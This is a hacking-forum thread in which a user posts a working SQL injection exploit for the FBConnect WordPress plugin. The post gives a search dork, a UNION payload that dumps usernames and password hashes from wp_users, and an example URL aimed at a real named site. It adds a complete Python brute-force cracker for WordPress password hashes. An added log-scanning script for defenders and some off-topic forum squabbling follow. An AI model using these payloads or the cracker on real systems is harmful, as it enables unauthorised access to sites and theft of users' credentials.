x3uz

[SQL] Wordpress Sql Injection FBConnect


Wordpress Sql Injection

App : FBConnect WordPress Plugin

Type : Sql-Injection

Dork : inurl:"fbconnect_action=myhome"

Exploit :

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

PoC :

www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

Example:

http://www.ariesdubs.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29kiddevilz,7,8,9,10,11,12+from+wp_users--

OK, when you have the hash (md5 and encode64()), you can test a brute force with this (Python):

# code by : tdxev
# website : www.tdxev.com
# team : www.insecurity.ro
# version : 2011.01.17
# documentation : /wp-includes/class-phpass.php

import md5
import time

# user settings
wpHashList = ["$P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340"] # list of wordpress hashes; $P$BRDa64Z9uIwrPlsRPDbWrVwLqvh7340 = tdxev
charSet = 'abcdefghijklmnopqrstuvwxyz0123456789_-' # the character set that the script will use
dumpFile = '/tmp/wp_crack_result.txt' # the file where the script will dump the result for each hash
progFile = '/tmp/wp_crack_progress.txt' # the file where the script will keep track of progress made
# app settings
itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'

# used by crypt_private (port of encode64 from class-phpass.php)
def encode64(textInput, count):
    output = ''
    i = 0
    while i < count:
        i = i + 1
        value = ord(textInput[i-1])
        output = output + itoa64[value & 63]
        if i < count:
            value = value | ord(textInput[i]) << 8
        output = output + itoa64[(value >> 6) & 63]
        if i >= count: # phpass checks the index before incrementing it
            break
        i = i + 1
        if i < count:
            value = value | ord(textInput[i]) << 16
        output = output + itoa64[(value >> 12) & 63]
        if i >= count:
            break
        i = i + 1
        output = output + itoa64[(value >> 18) & 63]

    return output

# generate wordpress hash
def crypt_private(plainText, wordpressHash):
    output = '*0' # old type | not supported yet
    if wordpressHash[0:2] == output:
        output = '*1'
    if wordpressHash[0:3] != '$P$': # old type | not supported yet
        return output
    count_log2 = itoa64.find(wordpressHash[3]) # log2 of how many times the hash will be regenerated
    if (count_log2 < 7) or (count_log2 > 30):
        return output
    count = 1 << count_log2 # number of md5 rounds
    salt = wordpressHash[4:12] # get salt from the wordpress hash
    if len(salt) != 8:
        return output
    plainTextHash = md5.new(str(salt)+str(plainText)).digest() # generate the first hash from salt and word to try
    for i in range(count):
        plainTextHash = md5.new(str(plainTextHash)+str(plainText)).digest() # regenerate the hash
    output = wordpressHash[0:12] # get the first part of the wordpress hash (type,count,salt)
    output = output + encode64(plainTextHash, 16) # create the new hash
    return output


# class that generates the words
class wordGenerator():

    def __init__(self, word, charSet):
        self.setCurretWord(word) # word to start
        self.setCharSet(charSet) # character set used to generate the words

    # set current word
    def setCurretWord(self, word):
        self.currentWord = word

    # set the character set that will be used
    def setCharSet(self, charSet):
        self.charSet = charSet

    # generate the next word, set that word as currentWord and return the word
    def nextWord(self):
        self.setCurretWord(self._incWord(self.currentWord))
        return self.currentWord

    # generate the next word
    def _incWord(self, word):
        word = str(word) # convert to string

        if word == '': # if word is empty
            return self.charSet[0] # return first char from the char set
        wordLastChar = word[len(word)-1] # get the last char
        wordLeftSide = word[0:len(word)-1] # get word without the last char
        lastCharPos = self.charSet.find(wordLastChar) # get position of last char in the char set

        if (lastCharPos+1) < len(self.charSet): # if position of last char is not at the end of the char set
            wordLastChar = self.charSet[lastCharPos+1] # get next char from the char set

        else: # it is the last char
            wordLastChar = self.charSet[0] # reset last char to the first character from the char set
            wordLeftSide = self._incWord(wordLeftSide) # send left side to be increased

        return wordLeftSide + wordLastChar # return the next word


# check if the hashes are of the right type
for wpHash in wpHashList:
    if wpHash[0:3] != '$P$':
        print "Wrong password type or password type is DES, not implemented yet!"
        exit()

# create a new wordGenerator
newWord = wordGenerator('', charSet) # word generator
wordsFound = 0
exitLoop = False

def found(hashItem, word):
    global wordsFound
    global exitLoop

    d = open(dumpFile, 'a') # open file for append
    d.write(hashItem + ' = ' + word + "\n") # write the result
    d.close() # close file

    wordsFound = wordsFound + 1 # increase the number of hashes cracked
    print hashItem + ' = ' + word # display the word
    if wordsFound == len(wpHashList): # if the number of hashes cracked equals the number of hashes in the list
        exitLoop = True # raise flag to stop the loop and exit

def setProgress(word):
    d = open(progFile, 'w') # open file for writing
    d.write("Position :" + word + "\n") # write the current word
    d.close() # close file


count = 0
while exitLoop == False:
    word = newWord.nextWord()
    count = count + 1
    #print word
    for wpHash in wpHashList:
        newHash = crypt_private(word, wpHash)
        if wpHash == newHash:
            found(newHash, word)
    if count == 1000:
        count = 0
        setProgress(word)

H4ve fun :D:D:D

Edited by x3uz
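As an added example that is not part of the original post: a defender-side check that flags the injection pattern above in web server access logs. It parses Apache combined-format lines, decodes the query string and reports any request where fbconnect_action=myhome is paired with a non-numeric fbuserid (the plugin expects an integer id). The log lines are constructed samples, and the regex and SQL token list are my own assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Jan/2011:10:01:02 +0000] "GET /?fbconnect_action=myhome&fbuserid=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [17/Jan/2011:10:01:05 +0000] "GET /blog/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 200 6011 "-" "curl/7.21.0"
203.0.113.9 - - [17/Jan/2011:10:01:09 +0000] "GET /?fbconnect_action=myhome&fbuserid=1%27%20or%201%3D1 HTTP/1.1" 500 312 "-" "curl/7.21.0"
198.51.100.4 - - [17/Jan/2011:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client ip, timestamp, method, request path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Substrings typical of the payload shown in the post (assumed list, extend as needed).
SQL_TOKENS = ("union", "select", "concat", "wp_users", "--", "'", "or ", "and ")

def classify_fbuserid(value):
    """Return None for a well-formed integer id, otherwise the offending value."""
    value = value.strip()
    return None if value.isdigit() else value

def scan_log(text):
    """Return (ip, status, decoded_fbuserid, matched_tokens) for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes and turns '+' into spaces, as the server would.
        query = parse_qs(urlsplit(m.group("path")).query)
        if query.get("fbconnect_action") != ["myhome"] or "fbuserid" not in query:
            continue
        bad = classify_fbuserid(query["fbuserid"][0])
        if bad is None:
            continue
        tokens = [t for t in SQL_TOKENS if t in bad.lower()]
        findings.append((m.group("ip"), int(m.group("status")), bad, tokens))
    return findings

if __name__ == "__main__":
    for ip, status, value, tokens in scan_log(SAMPLE_LOG):
        print("%s status=%d fbuserid=%r tokens=%s" % (ip, status, value, tokens))
```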

@redcoder, haven't you realised yet that people post any old rubbish now? Some post just to look busy even though they are completely clueless. I bet MR.KYKY has no idea what a dork is or how to use one. Even if you gave him the script compiled and with a GUI, he would have no idea what to do with it.

Stop posting for the sake of posting, guys, because it's worth nothing. Better to have 10 times fewer posts but with something useful in them, rather than junk. All the "hi" and "welcome" threads have more replies than any other.

At least look, for f***'s sake, at what Nytro posts and learn something. On his threads I've seen no replies, or very rarely.


@tunet magic, honestly, I think it's fine that there aren't many replies to nytro's threads. It would be absurd to see all the kids commenting "that's right, the tutorial is good" or "you're right, it really works". =)) Besides, I don't think most of them (the kids) understand enough English to get through a tutorial... they manage in Metin, in CS, in silly stuff, but for a tutorial, it had better be translated into Romanian, with as many pictures as possible. :))

Sorry for the off-topic, but I couldn't help myself. By the way, nice SQLi, I haven't had a chance to test it yet, but I think I'll make time tomorrow. :)

Edited by hammerfall
SQLi, not XSS... tiredness... :p

redcoder, I did it manually!

Edit :

MagicThunder, and what if I tell you that I do know about dorks, XSS, Perl, C++, Python, Visual Basic 2006-2008 etc... Please restrain yourself next time, especially with the language. After all, we are on a forum where you don't go off-topic for no reason, ok? Thanks

For you, MagicThunder:


Edited by Mr.KyKy